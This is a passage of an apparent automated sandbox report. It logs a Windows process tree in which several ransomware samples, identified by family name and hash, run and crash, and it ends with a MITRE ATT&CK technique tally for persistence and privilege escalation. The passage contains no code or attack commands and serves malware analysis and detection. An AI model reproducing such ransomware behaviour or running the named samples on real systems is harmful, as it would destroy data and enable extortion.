                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2404 -ip 2404
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:6220
                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4936 -ip 4936
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:1068
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4936 -ip 4936
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:6172
                                                                                                                                                                                                                    • C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                      C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:3696
                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:1780
                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                            PID:3208
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Trojan-Ransom.Win32.Avaddon.bl-c7c9f8f68348fbd26aae20c9ccb1aefd1cfce63897efa4c64abe7ac480253259.exe
                                                                                                                                                                                                                            C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Trojan-Ransom.Win32.Avaddon.bl-c7c9f8f68348fbd26aae20c9ccb1aefd1cfce63897efa4c64abe7ac480253259.exe
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                              PID:1044
                                                                                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                                                                                              explorer.exe
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:3336
                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                  PID:7588
                                                                                                                                                                                                                                • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe
                                                                                                                                                                                                                                  "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:2860
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2072 -ip 2072
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                      PID:7932
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2072 -ip 2072
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                        PID:540
                                                                                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                                                                                        explorer.exe
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                          PID:7504
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 2072 -ip 2072
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                            PID:5252
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 2072 -ip 2072
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                              PID:3508
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2072 -ip 2072
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                PID:7420
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 5908 -ip 5908
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                  PID:6984
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 2072 -ip 2072
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                    PID:1468
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 2072 -ip 2072
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                      PID:5136
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 2072 -ip 2072
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                        PID:3360
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2072 -ip 2072
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                          PID:5432
                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                            PID:7724
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2072 -ip 2072
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                              PID:5092
                                                                                                                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                              explorer.exe
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                PID:3848
                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                  PID:3620
                                                                                                                                                                                                                                                                • C:\Windows\system32\wbengine.exe
                                                                                                                                                                                                                                                                  "C:\Windows\system32\wbengine.exe"
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                    PID:7568
                                                                                                                                                                                                                                                                  • C:\Windows\System32\vdsldr.exe
                                                                                                                                                                                                                                                                    C:\Windows\System32\vdsldr.exe -Embedding
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                      PID:3716
                                                                                                                                                                                                                                                                    • C:\Windows\System32\vds.exe
                                                                                                                                                                                                                                                                      C:\Windows\System32\vds.exe
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                        PID:5104
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 6624 -ip 6624
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                          PID:3304
                                                                                                                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                          explorer.exe
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                            PID:8148
                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                              PID:4196
                                                                                                                                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                              explorer.exe
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                PID:4660
                                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                  PID:3504
                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                    PID:5624
                                                                                                                                                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                    explorer.exe
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                      PID:5464
                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                        PID:4216
                                                                                                                                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        explorer.exe
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                          PID:6172
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Desktop\00384\Trojan-Ransom.Win32.Sodin.lg-7fc70136a6451dc0ac77f01552538be8db2c912ed00162337f1c77e244e0c44d.exe
                                                                                                                                                                                                                                                                                            "C:\Users\Admin\Desktop\00384\Trojan-Ransom.Win32.Sodin.lg-7fc70136a6451dc0ac77f01552538be8db2c912ed00162337f1c77e244e0c44d.exe"
                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                              PID:3776
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 3776 -s 380
                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                                                                PID:3680
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Desktop\00384\Trojan-Ransom.Win32.Sodin.xh-8f2ab18f883ef0d2a9c46c63baf95a8b2b489388dbe5f8fa1b68248bc23fa598.exe
                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Desktop\00384\Trojan-Ransom.Win32.Sodin.xh-8f2ab18f883ef0d2a9c46c63baf95a8b2b489388dbe5f8fa1b68248bc23fa598.exe"
                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                PID:2068
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2068 -s 372
                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                                                                                  PID:1276
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2068 -s 376
                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                                                                                  PID:2160
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2068 -s 376
                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                                                                                  PID:1804
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Desktop\00384\Trojan-Ransom.Win32.Sodin.xh-8f2ab18f883ef0d2a9c46c63baf95a8b2b489388dbe5f8fa1b68248bc23fa598.exe
                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Desktop\00384\Trojan-Ransom.Win32.Sodin.xh-8f2ab18f883ef0d2a9c46c63baf95a8b2b489388dbe5f8fa1b68248bc23fa598.exe"
                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                    PID:5460
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5460 -s 340
                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                                                                      PID:1380
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5460 -s 360
                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                                                                      PID:1932
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5460 -s 360
                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                                                                      PID:6552
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5460 -s 652
                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                                                                      PID:2684
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5460 -s 652
                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                                                                      PID:3520
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5460 -s 652
                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                                                                      PID:2448
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5460 -s 724
                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                                                                      PID:4712
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5460 -s 732
                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                                                                      PID:2036
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5460 -s 748
                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                                                                      PID:6352
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5460 -s 756
                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                                                                      PID:6476
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Desktop\00384\Trojan-Ransom.Win32.WannaRen.i-195d8e3ba33b976cd661d7526daaae4852c6330bd6bb1ff7646cd7f2c0f1ad3f.exe
                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Desktop\00384\Trojan-Ransom.Win32.WannaRen.i-195d8e3ba33b976cd661d7526daaae4852c6330bd6bb1ff7646cd7f2c0f1ad3f.exe"
                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                    PID:2808
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Desktop\00384\Trojan-Ransom.Win32.Xorist.lk-a979d5ccddf18f11bc9db3822def9b6d15c40f7962ece670882566e9287c7c3d.exe
                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Desktop\00384\Trojan-Ransom.Win32.Xorist.lk-a979d5ccddf18f11bc9db3822def9b6d15c40f7962ece670882566e9287c7c3d.exe"
                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                      PID:6268
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\00384\Trojan-Ransom.Win32.Sfile.c-d3bf17ac4db4f367cfed8f40f92670066ca97e98d210b043e4d3b89a4971bbdf.exe
                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Desktop\00384\Trojan-Ransom.Win32.Sfile.c-d3bf17ac4db4f367cfed8f40f92670066ca97e98d210b043e4d3b89a4971bbdf.exe"
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                        PID:5524
                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                        PID:5092
                                                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                          PID:6760
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\werfault.exe
                                                                                                                                                                                                                                                                                                          werfault.exe /h /shared Global\1c3343590cb741c2ad4a879884b990d5 /t 1616 /p 3352
                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                            PID:3528
                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                                                                            C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                              PID:508
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 3776 -ip 3776
                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                PID:7256
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 2068 -ip 2068
                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                  PID:5144
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 2068 -ip 2068
                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                    PID:2448
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2068 -ip 2068
                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                      PID:5112
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 5460 -ip 5460
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                        PID:5956
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 5460 -ip 5460
                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                          PID:6976
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 5460 -ip 5460
                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                            PID:1808
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 5460 -ip 5460
                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                              PID:7784
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5460 -ip 5460
                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                PID:5388
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 5460 -ip 5460
                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                  PID:5184
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5460 -ip 5460
                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                    PID:5884
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 5460 -ip 5460
                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                      PID:512
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 5460 -ip 5460
                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                        PID:8048
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 5460 -ip 5460
                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                          PID:1604

                                                                                                                                                                                                                                                                                                                                        Network

                                                                                                                                                                                                                                                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                                                                                        Reconnaissance

                                                                                                                                                                                                                                                                                                                                        Resource Development

                                                                                                                                                                                                                                                                                                                                        Initial Access

                                                                                                                                                                                                                                                                                                                                        Execution

                                                                                                                                                                                                                                                                                                                                        Command and Scripting Interpreter

                                                                                                                                                                                                                                                                                                                                        2
                                                                                                                                                                                                                                                                                                                                        T1059

                                                                                                                                                                                                                                                                                                                                        Scheduled Task/Job

                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                        T1053

                                                                                                                                                                                                                                                                                                                                        Scheduled Task

                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                        T1053.005

                                                                                                                                                                                                                                                                                                                                        System Services

                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                        T1569

                                                                                                                                                                                                                                                                                                                                        Service Execution

                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                        T1569.002

                                                                                                                                                                                                                                                                                                                                        Windows Management Instrumentation

                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                        T1047

                                                                                                                                                                                                                                                                                                                                        Persistence

                                                                                                                                                                                                                                                                                                                                        Boot or Logon Autostart Execution

                                                                                                                                                                                                                                                                                                                                        3
                                                                                                                                                                                                                                                                                                                                        T1547

                                                                                                                                                                                                                                                                                                                                        Active Setup

                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                        T1547.014

                                                                                                                                                                                                                                                                                                                                        Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                        T1547.001

                                                                                                                                                                                                                                                                                                                                        Winlogon Helper DLL

                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                        T1547.004

                                                                                                                                                                                                                                                                                                                                        Create or Modify System Process

                                                                                                                                                                                                                                                                                                                                        2
                                                                                                                                                                                                                                                                                                                                        T1543

                                                                                                                                                                                                                                                                                                                                        Windows Service

                                                                                                                                                                                                                                                                                                                                        2
                                                                                                                                                                                                                                                                                                                                        T1543.003

                                                                                                                                                                                                                                                                                                                                        Scheduled Task/Job

                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                        T1053

                                                                                                                                                                                                                                                                                                                                        Scheduled Task

                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                        T1053.005

                                                                                                                                                                                                                                                                                                                                        Privilege Escalation

                                                                                                                                                                                                                                                                                                                                        Abuse Elevation Control Mechanism

                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                        T1548

                                                                                                                                                                                                                                                                                                                                        Bypass User Account Control

                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                        T1548.002

                                                                                                                                                                                                                                                                                                                                        Boot or Logon Autostart Execution

                                                                                                                                                                                                                                                                                                                                        3
                                                                                                                                                                                                                                                                                                                                        T1547

                                                                                                                                                                                                                                                                                                                                        Active Setup

                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                        T1547.014

                                                                                                                                                                                                                                                                                                                                        Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                        T1547.001

                                                                                                                                                                                                                                                                                                                                        Winlogon Helper DLL

                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                        T1547.004

                                                                                                                                                                                                                                                                                                                                        Create or Modify System Process

                                                                                                                                                                                                                                                                                                                                        2
                                                                                                                                                                                                                                                                                                                                        T1543

                                                                                                                                                                                                                                                                                                                                        Windows Service

                                                                                                                                                                                                                                                                                                                                        2
                                                                                                                                                                                                                                                                                                                                        T1543.003

                                                                                                                                                                                                                                                                                                                                        Scheduled Task/Job

                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                        T1053

                                                                                                                                                                                                                                                                                                                                        Scheduled Task

                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                        T1053.005

                                                                                                                                                                                                                                                                                                                                        Defense Evasion

